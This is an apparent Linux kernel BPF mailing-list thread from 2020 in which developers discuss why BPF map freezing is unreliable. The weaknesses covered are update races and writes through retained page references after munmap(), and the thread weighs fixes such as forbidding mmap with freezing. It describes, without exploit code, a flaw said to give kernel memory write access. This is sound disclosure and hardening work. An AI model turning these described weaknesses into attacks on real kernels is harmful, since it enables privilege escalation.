> well. I'd be curious to hear what others think about this issue.

Map freezing only has an effect on the verifier if the map was created
with BPF_F_RDONLY_PROG, which prevents the BPF program from updating
the map, right?

> > > > 3. It is assumed that a memory mapping can't be used to write to a
> > > > page anymore after the mapping has been removed; but actually,
> > > > userspace can grab references to pages in a VMA and use those
> > > > references to write to the VMA's pages after the VMA has already been
> > > > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > > > "gcc -pthread ...")
> > >
> > > Please help me understand how that works (assuming we drop
> > > VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> > > freeze(). After munmap() refcount of writable pages should drop to
> > > zero. And mmap'ed address should be invalid and unmapped. I'm missing
> > > how after munmap() parallel thread still can write to that memory
> > > page?
> >
> > The mmap()/munmap() syscalls place references to the pages the kernel
> > is using in the page tables of the process. Some other syscalls (such
> > as process_vm_writev()) can read these page table entries, take their
> > own references on those backing pages, and then continue to access
> > those pages even after they've been removed from the task's page
> > tables by munmap(). This works as long as the page table entries don't
> > have magic marker bits on them that prohibit this, which you get if
> > you use something like remap_pfn_range() in a loop instead of
> > remap_vmalloc_range() - but the memory mappings created by that
> > syscall are weird, and e.g. some syscalls like read() and write()
> > might sometimes fail if the buffer argument points into such a memory
> > region.
>
> So mmap() subsystem won't event know about those extra references and
> thus we can't really account that in our code, right? That's sad, but
> hopefully those APIs are root-only?

Nope, those APIs are reachable by normal users. These extra references
are counted on the page refcount - since they have to be tracked
somehow - but as far as I know, that refcount can also be elevated
spuriously, so triggering hard errors based on it is probably not a
good idea.


> > > > Is there a reason why the verifier doesn't replace loads from frozen
> > > > maps with the values stored in those maps? That seems like it would be
> > > > not only easier to secure, but additionally more performant.
> > >
> > > Verifier doesn't always know exact offset at which program is going to
> > > read read-only map contents. So something like this works:
> > >
> > > const volatile long arr[256];
> > >
> > > int x = rand() % 256;
> > > int y = arr[x];
> > >
> > > In this case verifier doesn't really know the value of y, so it can't
> > > be inlined. Then you can have code in which in one branch register is
> > > loaded with known value, but in another branch same register gets some
> > > value at random offset. Constant tracking is code path-sensitive,
> > > while instructions are shared between different code paths. Unless I'm
> > > missing what you are proposing :)
> >
> > Ah, I missed that possibility. But is that actually something that
> > people do in practice? Or would it be okay for the verifier to just
> > assume an unknown value in these cases?
>
> Verifier will assume unknown value for the branch that has variable
> offset. It can't do the same for another branch (with constant offset)
> because it might not yet have encountered branch with variable offset.
> But either way, you were proposing to rewrite instruction and inline
> read constant, and I don't think it's possible because of this.

Ah, I see what you mean. That sucks. I guess that means that to fix
this up properly in such edgecases, we'd have to, for each memory
read, keep track of all the values that we want to hardcode for it,
and then generate branches in the unlikely case that the instruction
was reached on paths that expect different values?

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-14 16:07       ` Jann Horn
@ 2020-04-14 19:46         ` Andrii Nakryiko
  2020-04-14 22:50           ` Jann Horn
  0 siblings, 1 reply; 11+ messages in thread
From: Andrii Nakryiko @ 2020-04-14 19:46 UTC (permalink / raw)
  To: Jann Horn; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
>
> On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> <andrii.nakryiko@gmail.com> wrote:
> > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > <andrii.nakryiko@gmail.com> wrote:
> > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > >
> > > > > Hi!
> > > > >
> > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > verifier then assumes that they contain constant values. However, map
> > > > > freezing is pretty wobbly:
> > > > >
> > > > > 1. The syscalls for updating maps from userspace don't seem to lock
> > > > > the map at all.
> > > >
> > > > True, there is a tiny race between freezing and map updates, but I
> > > > don't think it's possible to solve it without taking locks all around
> > > > the place in map update operations.
> > >
> > > Yeah. So I think BPF should do exactly that. Or change the userspace
> > > API so that userspace has to say at map creation time "I'll freeze
> > > this map later", and then you only have to do the locking if that flag
> > > is set.
> >
> > I'd love to be able to create frozen maps from the get go (and specify
> > initial values for the map), but freezing is done the way it's done
> > already, unfortunately :(
> > Regarding locking, maps could be updated from BPF program side as
> > well. I'd be curious to hear what others think about this issue.
>
> Map freezing only has an effect on the verifier if the map was created
> with BPF_F_RDONLY_PROG, which prevents the BPF program from updating
> the map, right?

Yes, good point.

>
> > > > > 3. It is assumed that a memory mapping can't be used to write to a
> > > > > page anymore after the mapping has been removed; but actually,
> > > > > userspace can grab references to pages in a VMA and use those
> > > > > references to write to the VMA's pages after the VMA has already been
> > > > > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > > > > "gcc -pthread ...")
> > > >
> > > > Please help me understand how that works (assuming we drop
> > > > VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> > > > freeze(). After munmap() refcount of writable pages should drop to
> > > > zero. And mmap'ed address should be invalid and unmapped. I'm missing
> > > > how after munmap() parallel thread still can write to that memory
> > > > page?
> > >
> > > The mmap()/munmap() syscalls place references to the pages the kernel
> > > is using in the page tables of the process. Some other syscalls (such
> > > as process_vm_writev()) can read these page table entries, take their
> > > own references on those backing pages, and then continue to access
> > > those pages even after they've been removed from the task's page
> > > tables by munmap(). This works as long as the page table entries don't
> > > have magic marker bits on them that prohibit this, which you get if
> > > you use something like remap_pfn_range() in a loop instead of
> > > remap_vmalloc_range() - but the memory mappings created by that
> > > syscall are weird, and e.g. some syscalls like read() and write()
> > > might sometimes fail if the buffer argument points into such a memory
> > > region.
> >
> > So mmap() subsystem won't event know about those extra references and
> > thus we can't really account that in our code, right? That's sad, but
> > hopefully those APIs are root-only?
>
> Nope, those APIs are reachable by normal users. These extra references
> are counted on the page refcount - since they have to be tracked
> somehow - but as far as I know, that refcount can also be elevated
> spuriously, so triggering hard errors based on it is probably not a
> good idea.
>

Just trying to educate myself and you seem to know a lot about this.
If we think about regular file memory-mapping with mmap(). According
to this, it seems like it would be possible to mmap() file as writable
first, do some changes and then munmap. At this point some application
would assume that file can't be modified anymore and can be treated as
read-only, yet, it's possible that some other process/thread can just
go and still modify file contents. Do I understand correctly?

>
> > > > > Is there a reason why the verifier doesn't replace loads from frozen
> > > > > maps with the values stored in those maps? That seems like it would be
> > > > > not only easier to secure, but additionally more performant.
> > > >
> > > > Verifier doesn't always know exact offset at which program is going to
> > > > read read-only map contents. So something like this works:
> > > >
> > > > const volatile long arr[256];
> > > >
> > > > int x = rand() % 256;
> > > > int y = arr[x];
> > > >
> > > > In this case verifier doesn't really know the value of y, so it can't
> > > > be inlined. Then you can have code in which in one branch register is
> > > > loaded with known value, but in another branch same register gets some
> > > > value at random offset. Constant tracking is code path-sensitive,
> > > > while instructions are shared between different code paths. Unless I'm
> > > > missing what you are proposing :)
> > >
> > > Ah, I missed that possibility. But is that actually something that
> > > people do in practice? Or would it be okay for the verifier to just
> > > assume an unknown value in these cases?
> >
> > Verifier will assume unknown value for the branch that has variable
> > offset. It can't do the same for another branch (with constant offset)
> > because it might not yet have encountered branch with variable offset.
> > But either way, you were proposing to rewrite instruction and inline
> > read constant, and I don't think it's possible because of this.
>
> Ah, I see what you mean. That sucks. I guess that means that to fix
> this up properly in such edgecases, we'd have to, for each memory
> read, keep track of all the values that we want to hardcode for it,
> and then generate branches in the unlikely case that the instruction
> was reached on paths that expect different values?

I guess, though that sounds extreme and extremely unlikely. I'd say
the better way would be to implement immutable BPF maps from the time
they are created. E.g., at the time of creating map, you specify extra
flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
key/value pairs in it.

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-14 19:46         ` Andrii Nakryiko
@ 2020-04-14 22:50           ` Jann Horn
  2020-04-15  4:59             ` Andrii Nakryiko
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-14 22:50 UTC (permalink / raw)
  To: Andrii Nakryiko; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Tue, Apr 14, 2020 at 9:46 PM Andrii Nakryiko
<andrii.nakryiko@gmail.com> wrote:
> On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
> > On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> > <andrii.nakryiko@gmail.com> wrote:
> > > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > > >
> > > > > > Hi!
> > > > > >
> > > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > > verifier then assumes that they contain constant values. However, map
> > > > > > freezing is pretty wobbly:
[...]
> > > > > > 3. It is assumed that a memory mapping can't be used to write to a
> > > > > > page anymore after the mapping has been removed; but actually,
> > > > > > userspace can grab references to pages in a VMA and use those
> > > > > > references to write to the VMA's pages after the VMA has already been
> > > > > > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > > > > > "gcc -pthread ...")
> > > > >
> > > > > Please help me understand how that works (assuming we drop
> > > > > VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> > > > > freeze(). After munmap() refcount of writable pages should drop to
> > > > > zero. And mmap'ed address should be invalid and unmapped. I'm missing
> > > > > how after munmap() parallel thread still can write to that memory
> > > > > page?
> > > >
> > > > The mmap()/munmap() syscalls place references to the pages the kernel
> > > > is using in the page tables of the process. Some other syscalls (such
> > > > as process_vm_writev()) can read these page table entries, take their
> > > > own references on those backing pages, and then continue to access
> > > > those pages even after they've been removed from the task's page
> > > > tables by munmap(). This works as long as the page table entries don't
> > > > have magic marker bits on them that prohibit this, which you get if
> > > > you use something like remap_pfn_range() in a loop instead of
> > > > remap_vmalloc_range() - but the memory mappings created by that
> > > > syscall are weird, and e.g. some syscalls like read() and write()
> > > > might sometimes fail if the buffer argument points into such a memory
> > > > region.
> > >
> > > So mmap() subsystem won't event know about those extra references and
> > > thus we can't really account that in our code, right? That's sad, but
> > > hopefully those APIs are root-only?
> >
> > Nope, those APIs are reachable by normal users. These extra references
> > are counted on the page refcount - since they have to be tracked
> > somehow - but as far as I know, that refcount can also be elevated
> > spuriously, so triggering hard errors based on it is probably not a
> > good idea.
> >
>
> Just trying to educate myself and you seem to know a lot about this.
> If we think about regular file memory-mapping with mmap(). According
> to this, it seems like it would be possible to mmap() file as writable
> first, do some changes and then munmap. At this point some application
> would assume that file can't be modified anymore and can be treated as
> read-only, yet, it's possible that some other process/thread can just
> go and still modify file contents. Do I understand correctly?

Yep, exactly.

There are some longstanding issues around this stuff - e.g. in some
contrived scenarios, this can mean that when you call read() and
fork() at the same time in a multithreaded process, the data you read
becomes visible in the child instead of in the parent
(https://lore.kernel.org/lkml/CAG48ez17Of=dnymzm8GAN_CNG1okMg1KTeMtBQhXGP2dyB5uJw@mail.gmail.com/).
At least a while ago, it could also cause crashes in filesystem code
(see e.g. https://lwn.net/Articles/774411/), and cause issues for code
that wants to compute stable checksums of pages
(https://lwn.net/Articles/787636/); I'm not sure what the state of
that stuff is.

> > > > > > Is there a reason why the verifier doesn't replace loads from frozen
> > > > > > maps with the values stored in those maps? That seems like it would be
> > > > > > not only easier to secure, but additionally more performant.
> > > > >
> > > > > Verifier doesn't always know exact offset at which program is going to
> > > > > read read-only map contents. So something like this works:
> > > > >
> > > > > const volatile long arr[256];
> > > > >
> > > > > int x = rand() % 256;
> > > > > int y = arr[x];
> > > > >
> > > > > In this case verifier doesn't really know the value of y, so it can't
> > > > > be inlined. Then you can have code in which in one branch register is
> > > > > loaded with known value, but in another branch same register gets some
> > > > > value at random offset. Constant tracking is code path-sensitive,
> > > > > while instructions are shared between different code paths. Unless I'm
> > > > > missing what you are proposing :)
> > > >
> > > > Ah, I missed that possibility. But is that actually something that
> > > > people do in practice? Or would it be okay for the verifier to just
> > > > assume an unknown value in these cases?
> > >
> > > Verifier will assume unknown value for the branch that has variable
> > > offset. It can't do the same for another branch (with constant offset)
> > > because it might not yet have encountered branch with variable offset.
> > > But either way, you were proposing to rewrite instruction and inline
> > > read constant, and I don't think it's possible because of this.
> >
> > Ah, I see what you mean. That sucks. I guess that means that to fix
> > this up properly in such edgecases, we'd have to, for each memory
> > read, keep track of all the values that we want to hardcode for it,
> > and then generate branches in the unlikely case that the instruction
> > was reached on paths that expect different values?
>
> I guess, though that sounds extreme and extremely unlikely.

It just seems kinda silly to me to have extra memory loads if we know
that those loads will in most cases load the same fixed value on every
execution... but oh well.

> I'd say
> the better way would be to implement immutable BPF maps from the time
> they are created. E.g., at the time of creating map, you specify extra
> flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
> key/value pairs in it.

It seems a bit hacky to me to add a new special interface for
populating an immutable map. Wouldn't it make more sense to add a flag
for "you can't use mmap on this map", or "I plan to freeze this map",
or something like that, and keep the freezing API?

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-14 22:50           ` Jann Horn
@ 2020-04-15  4:59             ` Andrii Nakryiko
  2020-04-15 19:07               ` Jann Horn
  0 siblings, 1 reply; 11+ messages in thread
From: Andrii Nakryiko @ 2020-04-15  4:59 UTC (permalink / raw)
  To: Jann Horn; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Tue, Apr 14, 2020 at 3:50 PM Jann Horn <jannh@google.com> wrote:
>
> On Tue, Apr 14, 2020 at 9:46 PM Andrii Nakryiko
> <andrii.nakryiko@gmail.com> wrote:
> > On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
> > > On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> > > <andrii.nakryiko@gmail.com> wrote:
> > > > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > > > >
> > > > > > > Hi!
> > > > > > >
> > > > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > > > verifier then assumes that they contain constant values. However, map
> > > > > > > freezing is pretty wobbly:
> [...]
> > > > > > > 3. It is assumed that a memory mapping can't be used to write to a
> > > > > > > page anymore after the mapping has been removed; but actually,
> > > > > > > userspace can grab references to pages in a VMA and use those
> > > > > > > references to write to the VMA's pages after the VMA has already been
> > > > > > > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > > > > > > "gcc -pthread ...")
> > > > > >
> > > > > > Please help me understand how that works (assuming we drop
> > > > > > VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> > > > > > freeze(). After munmap() refcount of writable pages should drop to
> > > > > > zero. And mmap'ed address should be invalid and unmapped. I'm missing
> > > > > > how after munmap() parallel thread still can write to that memory
> > > > > > page?
> > > > >
> > > > > The mmap()/munmap() syscalls place references to the pages the kernel
> > > > > is using in the page tables of the process. Some other syscalls (such
> > > > > as process_vm_writev()) can read these page table entries, take their
> > > > > own references on those backing pages, and then continue to access
> > > > > those pages even after they've been removed from the task's page
> > > > > tables by munmap(). This works as long as the page table entries don't
> > > > > have magic marker bits on them that prohibit this, which you get if
> > > > > you use something like remap_pfn_range() in a loop instead of
> > > > > remap_vmalloc_range() - but the memory mappings created by that
> > > > > syscall are weird, and e.g. some syscalls like read() and write()
> > > > > might sometimes fail if the buffer argument points into such a memory
> > > > > region.
> > > >
> > > > So mmap() subsystem won't event know about those extra references and
> > > > thus we can't really account that in our code, right? That's sad, but
> > > > hopefully those APIs are root-only?
> > >
> > > Nope, those APIs are reachable by normal users. These extra references
> > > are counted on the page refcount - since they have to be tracked
> > > somehow - but as far as I know, that refcount can also be elevated
> > > spuriously, so triggering hard errors based on it is probably not a
> > > good idea.
> > >
> >
> > Just trying to educate myself and you seem to know a lot about this.
> > If we think about regular file memory-mapping with mmap(). According
> > to this, it seems like it would be possible to mmap() file as writable
> > first, do some changes and then munmap. At this point some application
> > would assume that file can't be modified anymore and can be treated as
> > read-only, yet, it's possible that some other process/thread can just
> > go and still modify file contents. Do I understand correctly?
>
> Yep, exactly.
>
> There are some longstanding issues around this stuff - e.g. in some
> contrived scenarios, this can mean that when you call read() and
> fork() at the same time in a multithreaded process, the data you read
> becomes visible in the child instead of in the parent
> (https://lore.kernel.org/lkml/CAG48ez17Of=dnymzm8GAN_CNG1okMg1KTeMtBQhXGP2dyB5uJw@mail.gmail.com/).
> At least a while ago, it could also cause crashes in filesystem code
> (see e.g. https://lwn.net/Articles/774411/), and cause issues for code
> that wants to compute stable checksums of pages
> (https://lwn.net/Articles/787636/); I'm not sure what the state of
> that stuff is.

Oh, ok, thanks for details. This is... illuminating for sure...

>
> > > > > > > Is there a reason why the verifier doesn't replace loads from frozen
> > > > > > > maps with the values stored in those maps? That seems like it would be
> > > > > > > not only easier to secure, but additionally more performant.
> > > > > >
> > > > > > Verifier doesn't always know exact offset at which program is going to
> > > > > > read read-only map contents. So something like this works:
> > > > > >
> > > > > > const volatile long arr[256];
> > > > > >
> > > > > > int x = rand() % 256;
> > > > > > int y = arr[x];
> > > > > >
> > > > > > In this case verifier doesn't really know the value of y, so it can't
> > > > > > be inlined. Then you can have code in which in one branch register is
> > > > > > loaded with known value, but in another branch same register gets some
> > > > > > value at random offset. Constant tracking is code path-sensitive,
> > > > > > while instructions are shared between different code paths. Unless I'm
> > > > > > missing what you are proposing :)
> > > > >
> > > > > Ah, I missed that possibility. But is that actually something that
> > > > > people do in practice? Or would it be okay for the verifier to just
> > > > > assume an unknown value in these cases?
> > > >
> > > > Verifier will assume unknown value for the branch that has variable
> > > > offset. It can't do the same for another branch (with constant offset)
> > > > because it might not yet have encountered branch with variable offset.
> > > > But either way, you were proposing to rewrite instruction and inline
> > > > read constant, and I don't think it's possible because of this.
> > >
> > > Ah, I see what you mean. That sucks. I guess that means that to fix
> > > this up properly in such edgecases, we'd have to, for each memory
> > > read, keep track of all the values that we want to hardcode for it,
> > > and then generate branches in the unlikely case that the instruction
> > > was reached on paths that expect different values?
> >
> > I guess, though that sounds extreme and extremely unlikely.
>
> It just seems kinda silly to me to have extra memory loads if we know
> that those loads will in most cases load the same fixed value on every
> execution... but oh well.
>
> > I'd say
> > the better way would be to implement immutable BPF maps from the time
> > they are created. E.g., at the time of creating map, you specify extra
> > flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
> > key/value pairs in it.
>
> It seems a bit hacky to me to add a new special interface for
> populating an immutable map. Wouldn't it make more sense to add a flag
> for "you can't use mmap on this map", or "I plan to freeze this map",
> or something like that, and keep the freezing API?

"you can't use mmap on this map" is default behavior, unless you
specify BPF_F_MMAPABLE. "I plan to freeze this map" could be added,
but how that would help existing users that freeze and mmap()?
Disallowing those now would be a breaking change.

Currently, libbpf is using freezing for .rodata variables, but it
doesn't mmap() before freezing. What we are talking about is malicious
user trying to cause a crash, which given everything is under root is
a bit of a moot point. So I don't know if we actually want to fix
anything here, given that lots of filesystems are already broken for a
while for similar reasons... But it's certainly good to know about
issues like this.

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-15  4:59             ` Andrii Nakryiko
@ 2020-04-15 19:07               ` Jann Horn
  2020-04-15 20:03                 ` Jann Horn
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-15 19:07 UTC (permalink / raw)
  To: Andrii Nakryiko; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Wed, Apr 15, 2020 at 6:59 AM Andrii Nakryiko
<andrii.nakryiko@gmail.com> wrote:
> On Tue, Apr 14, 2020 at 3:50 PM Jann Horn <jannh@google.com> wrote:
> > On Tue, Apr 14, 2020 at 9:46 PM Andrii Nakryiko
> > <andrii.nakryiko@gmail.com> wrote:
> > > On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
> > > > On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > > > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > > > > >
> > > > > > > > Hi!
> > > > > > > >
> > > > > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > > > > verifier then assumes that they contain constant values. However, map
> > > > > > > > freezing is pretty wobbly:
[...]
> > > > > > > > Is there a reason why the verifier doesn't replace loads from frozen
> > > > > > > > maps with the values stored in those maps? That seems like it would be
> > > > > > > > not only easier to secure, but additionally more performant.
> > > > > > >
> > > > > > > Verifier doesn't always know exact offset at which program is going to
> > > > > > > read read-only map contents. So something like this works:
> > > > > > >
> > > > > > > const volatile long arr[256];
> > > > > > >
> > > > > > > int x = rand() % 256;
> > > > > > > int y = arr[x];
> > > > > > >
> > > > > > > In this case verifier doesn't really know the value of y, so it can't
> > > > > > > be inlined. Then you can have code in which in one branch register is
> > > > > > > loaded with known value, but in another branch same register gets some
> > > > > > > value at random offset. Constant tracking is code path-sensitive,
> > > > > > > while instructions are shared between different code paths. Unless I'm
> > > > > > > missing what you are proposing :)
> > > > > >
> > > > > > Ah, I missed that possibility. But is that actually something that
> > > > > > people do in practice? Or would it be okay for the verifier to just
> > > > > > assume an unknown value in these cases?
> > > > >
> > > > > Verifier will assume unknown value for the branch that has variable
> > > > > offset. It can't do the same for another branch (with constant offset)
> > > > > because it might not yet have encountered branch with variable offset.
> > > > > But either way, you were proposing to rewrite instruction and inline
> > > > > read constant, and I don't think it's possible because of this.
> > > >
> > > > Ah, I see what you mean. That sucks. I guess that means that to fix
> > > > this up properly in such edgecases, we'd have to, for each memory
> > > > read, keep track of all the values that we want to hardcode for it,
> > > > and then generate branches in the unlikely case that the instruction
> > > > was reached on paths that expect different values?
> > >
> > > I guess, though that sounds extreme and extremely unlikely.
> >
> > It just seems kinda silly to me to have extra memory loads if we know
> > that those loads will in most cases load the same fixed value on every
> > execution... but oh well.
> >
> > > I'd say
> > > the better way would be to implement immutable BPF maps from the time
> > > they are created. E.g., at the time of creating map, you specify extra
> > > flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
> > > key/value pairs in it.
> >
> > It seems a bit hacky to me to add a new special interface for
> > populating an immutable map. Wouldn't it make more sense to add a flag
> > for "you can't use mmap on this map", or "I plan to freeze this map",
> > or something like that, and keep the freezing API?
>
> "you can't use mmap on this map" is default behavior, unless you
> specify BPF_F_MMAPABLE.

Ah, right.

> "I plan to freeze this map" could be added,
> but how that would help existing users that freeze and mmap()?
> Disallowing those now would be a breaking change.
> Currently, libbpf is using freezing for .rodata variables, but it
> doesn't mmap() before freezing.

Okay, so it sounds like there are probably no actual users that use
both BPF_F_MMAPABLE and freezing, and so we can just forbid that
combination? That sounds great.

> What we are talking about is malicious
> user trying to cause a crash, which given everything is under root is
> a bit of a moot point. So I don't know if we actually want to fix
> anything here, given that lots of filesystems are already broken for a
> while for similar reasons... But it's certainly good to know about
> issues like this.

Well, it's not just "crash", it's full write access to kernel memory.
I think such issues should be fixed for robustness reasons; and if BPF
does not fix such issues, that goes against the intent of Matthew
Garrett's lockdown LSM, and we'll have to block all of BPF in
lockdown's integrity mode if we ever want to get to a point where
lockdown actually does anything.

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-15 19:07               ` Jann Horn
@ 2020-04-15 20:03                 ` Jann Horn
  2020-04-16  5:42                   ` Andrii Nakryiko
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-15 20:03 UTC (permalink / raw)
  To: Andrii Nakryiko
  Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett, KP Singh

On Wed, Apr 15, 2020 at 9:07 PM Jann Horn <jannh@google.com> wrote:
> On Wed, Apr 15, 2020 at 6:59 AM Andrii Nakryiko
> <andrii.nakryiko@gmail.com> wrote:
> > On Tue, Apr 14, 2020 at 3:50 PM Jann Horn <jannh@google.com> wrote:
> > > On Tue, Apr 14, 2020 at 9:46 PM Andrii Nakryiko
> > > <andrii.nakryiko@gmail.com> wrote:
> > > > On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
> > > > > On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > > > > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > > > > > >
> > > > > > > > > Hi!
> > > > > > > > >
> > > > > > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > > > > > verifier then assumes that they contain constant values. However, map
> > > > > > > > > freezing is pretty wobbly:
[...]
> > > > I'd say
> > > > the better way would be to implement immutable BPF maps from the time
> > > > they are created. E.g., at the time of creating map, you specify extra
> > > > flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
> > > > key/value pairs in it.
> > >
> > > It seems a bit hacky to me to add a new special interface for
> > > populating an immutable map. Wouldn't it make more sense to add a flag
> > > for "you can't use mmap on this map", or "I plan to freeze this map",
> > > or something like that, and keep the freezing API?
> >
> > "you can't use mmap on this map" is default behavior, unless you
> > specify BPF_F_MMAPABLE.
>
> Ah, right.
>
> > "I plan to freeze this map" could be added,
> > but how that would help existing users that freeze and mmap()?
> > Disallowing those now would be a breaking change.
> > Currently, libbpf is using freezing for .rodata variables, but it
> > doesn't mmap() before freezing.
>
> Okay, so it sounds like there are probably no actual users that use
> both BPF_F_MMAPABLE and freezing, and so we can just forbid that
> combination? That sounds great.

kpsingh pointed out to me that bpf_object__load_skeleton() has code
specifically for mmap()ing BPF_F_RDONLY_PROG maps, so this might not
work... but perhaps we could make `BPF_F_RDONLY_PROG|BPF_F_MMAPABLE`
imply "you can only map with PROT_READ, not with PROT_WRITE"?
bpf_object__load_skeleton() only maps BPF_F_RDONLY_PROG maps with
PROT_READ.

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-15 20:03                 ` Jann Horn
@ 2020-04-16  5:42                   ` Andrii Nakryiko
  0 siblings, 0 replies; 11+ messages in thread
From: Andrii Nakryiko @ 2020-04-16  5:42 UTC (permalink / raw)
  To: Jann Horn
  Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett, KP Singh

On Wed, Apr 15, 2020 at 1:04 PM Jann Horn <jannh@google.com> wrote:
>
> On Wed, Apr 15, 2020 at 9:07 PM Jann Horn <jannh@google.com> wrote:
> > On Wed, Apr 15, 2020 at 6:59 AM Andrii Nakryiko
> > <andrii.nakryiko@gmail.com> wrote:
> > > On Tue, Apr 14, 2020 at 3:50 PM Jann Horn <jannh@google.com> wrote:
> > > > On Tue, Apr 14, 2020 at 9:46 PM Andrii Nakryiko
> > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > On Tue, Apr 14, 2020 at 9:07 AM Jann Horn <jannh@google.com> wrote:
> > > > > > On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
> > > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > > On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > > > > > > > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > > > > > > > <andrii.nakryiko@gmail.com> wrote:
> > > > > > > > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > > > > > > > >
> > > > > > > > > > Hi!
> > > > > > > > > >
> > > > > > > > > > I saw that BPF allows root to create frozen maps, for which the
> > > > > > > > > > verifier then assumes that they contain constant values. However, map
> > > > > > > > > > freezing is pretty wobbly:
> [...]
> > > > > I'd say
> > > > > the better way would be to implement immutable BPF maps from the time
> > > > > they are created. E.g., at the time of creating map, you specify extra
> > > > > flag BPF_F_IMMUTABLE and specify pointer to a blob of memory with
> > > > > key/value pairs in it.
> > > >
> > > > It seems a bit hacky to me to add a new special interface for
> > > > populating an immutable map. Wouldn't it make more sense to add a flag
> > > > for "you can't use mmap on this map", or "I plan to freeze this map",
> > > > or something like that, and keep the freezing API?
> > >
> > > "you can't use mmap on this map" is default behavior, unless you
> > > specify BPF_F_MMAPABLE.
> >
> > Ah, right.
> >
> > > "I plan to freeze this map" could be added,
> > > but how that would help existing users that freeze and mmap()?
> > > Disallowing those now would be a breaking change.
> > > Currently, libbpf is using freezing for .rodata variables, but it
> > > doesn't mmap() before freezing.
> >
> > Okay, so it sounds like there are probably no actual users that use
> > both BPF_F_MMAPABLE and freezing, and so we can just forbid that
> > combination? That sounds great.
>
> kpsingh pointed out to me that bpf_object__load_skeleton() has code
> specifically for mmap()ing BPF_F_RDONLY_PROG maps, so this might not
> work... but perhaps we could make `BPF_F_RDONLY_PROG|BPF_F_MMAPABLE`
> imply "you can only map with PROT_READ, not with PROT_WRITE"?
